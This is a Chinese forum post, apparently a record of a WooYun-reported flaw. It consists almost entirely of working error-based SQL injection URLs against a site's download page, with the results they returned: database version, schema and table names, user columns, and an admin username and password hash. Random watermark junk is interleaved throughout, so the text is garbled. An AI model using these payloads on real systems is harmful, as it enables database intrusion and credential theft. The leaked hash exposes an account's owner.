http://www.wooyun.org/bugs/wooyun-2010-01666& f }% R: K5 p6 h2 U9 O
% }/ V' u- }' g9 ]0 t5 z
之前想找个测试 没想到这有 可以测试下做个记录而已
% y6 R2 W1 ~, g9 f9 b* t* n* A3 J6 N, ^
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
/ _ x/ e8 r5 N6 E$ b: ~* }) {7 f& }2 r! @
/data0/htdocs/leqi_new/app/myapp.php
9 N- T0 D/ h" r; y: Z1 s7 t
: d2 u1 A+ j: w) c' L) T7 j" p5 l 或者, g; L) e8 z, Q: [; r
( q0 Y6 r: @. z" x9 E& X+ W/**********version()**********/ 5.1.49-log$ u8 H; L7 V$ S/ L
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* n' }, J/ w) [) z% W) W' p! }8 K- w9 l g
/**********user()**********/
8 ~) R% f/ A8 F7 @/ h$ ?9 mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
+ w( E8 |( @$ H) y) E2 j. B* S
& W5 V* \ S3 \0 ^6 F$ @# o/**********database()**********/ leqi% [6 H {; }* C) f) _, p
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! z" w2 }8 v0 V) o9 z5 u
8 Y) s1 U7 p! ]3 y/**********limit依次递归爆库**********/* J" L, d- m( ^
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
2 ]( q/ _6 d1 W' a( |7 J- uinformation_schema
' S+ `6 Y" _% c% t% A+ C0 Zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 N7 w* L3 S) E3 p* \' E
leqi
6 L1 I+ L$ |( K- C( [0 i( M. u+ mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% H% _% l2 a1 m$ n
test
, [' z# V' ]! N3 I! G) d6 k6 i9 h) G% a* D, C
/**********limit依次递归爆表名**********/: x M( X" l5 U( ^4 \
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
" L" l+ E; L0 wusers
# ]& N K$ c& j
" D! g9 {/ T: E# A/**********limit依次递归爆字段名**********/8 i1 A) Z6 O8 E! `; `
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0037 l6 a3 ^3 l+ @, J2 q
user_id,username,nickname,passwd,group_id
1 }9 E7 g% o3 q. q. R/ phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
3 s% l6 Z2 S# t+ m/wapc/5000_0005_003
; |5 v1 s0 X& _1 `% e11 21
* P8 `3 b+ `- l* Ihttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, _, \ D7 @/ x# H& i, P0 w/wapc/5000_0005_003
1 c* }2 l9 s8 K! C5 W; G11 341 351 361. _ }: Q7 a8 i
/**********爆数据**********/$ p- J; J& [( }$ |1 p
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/ y# [& N% ?! \& |2 H$ N+ jadmin+ w" I, o( r" |% x) }, \2 j; ], k' t
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%233 ^0 z& x5 c( {& y- M9 c
6a8b4574ca231eb8bd52764d4978ffcd3 U; [8 ?1 n: J4 E3 {/ X
8 x- u2 j0 B8 u( { {; p' E% ?7 v , ?$ {% [8 o7 `+ N4 ~, f
|
发表于 2012-9-13 17:52:09
收藏
支持
反对